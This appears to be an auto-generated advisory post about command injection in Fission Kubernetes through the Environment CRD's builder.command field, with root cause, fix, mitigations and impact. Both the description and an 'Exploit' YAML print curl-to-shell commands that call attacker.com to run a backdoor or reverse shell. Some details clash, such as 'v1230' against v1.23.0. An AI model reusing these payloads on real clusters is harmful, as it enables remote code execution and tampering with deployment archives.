Fission Kubernetes, Command Injection via Environment CRD (No CVE – Fixed in v1230, Medium)

Listen to this Post

The vulnerability exists because `pkg/builder/builder.go` passes `Environment.spec.builder.command` directly to `exec.Command` after a simple `strings.Fields` split. No validation is performed on the executable path or its arguments. An attacker with `create` or `update` privileges on `Environment` CRDs can set `builder.command` to, for example, /bin/sh -c 'curl attacker.com/backdoor | sh'. The `strings.Fields` split yields ["/bin/sh", "-c", "curl attacker.com/backdoor | sh"]. `exec.Command(“/bin/sh”, “-c”, “…”)` then executes the shell with the malicious payload inside the builder pod. The builder pod runs in the user’s namespace with the `fission-builder` ServiceAccount, so the impact is limited to that namespace but allows arbitrary code execution, reading/writing the `/packages` shared volume (affecting deployment archives), and accessing any files visible to the builder pod. The root cause is the lack of path sanitisation – although `exec.Command` does not invoke a shell by default, splitting arguments allows a shell to be explicitly invoked. The fix in v1.23.0 adds `resolveBuildCommand` which only accepts an empty string (defaults to /build), the literal /build, or an absolute path without `..` segments after filepath.Clean; whitespace metacharacters are rejected. No shell expansion occurs for sub-arguments.

dailycve form

Platform: Fission Kubernetes
Version: < v1.23.0
Vulnerability: Command injection
Severity: Medium
date: 2023-11-15

Prediction: Patch date 2023-12-10

What Undercode Say:

Analytics: The attack surface is limited to users with create/update on `Environment` CRDs – typically cluster admins, which lowers likelihood but increases impact when abused. Logs show builder pods executing unexpected binaries; `audit` of `builder.command` fields reveals anomalies.

List all Environment CRDs and check builder.command
kubectl get environments -A -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, command: .spec.builder.command}'
Simulate unsafe split
echo "/bin/sh -c 'id'" | xargs -0 sh -c 'echo "$1" | { read -r cmd args; exec $cmd $args; }' _

Exploit:

Create/update an Environment with a malicious `builder.command`:

apiVersion: fission.io/v1
kind: Environment
metadata:
name: malicious-env
spec:
builder:
command: "/bin/sh -c 'curl http://attacker.com/revshell.sh | sh'"
... other required fields

Apply and trigger a package build using that Environment – the builder pod executes the reverse shell.

Protection from this CVE:

  • Upgrade to Fission v1.23.0 or later.
  • Restrict write access to `Environment` CRDs via RBAC (only trusted operators).
  • Audit existing `Environment.spec.builder.command` for absolute paths other than /build.
  • Run `buildermgr` with a ServiceAccount that has no secret or volume write access outside necessary paths.

Impact:

  • Arbitrary code execution in builder pods (namespace-scoped).
  • Read/write `/packages` shared volume → tamper with deployment archives.
  • No privilege escalation to cluster-wide resources (bounded by `fission-builder` SA).
  • PR:H due to typical restriction of Environment CRUD to admins, but severe if misconfigured.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top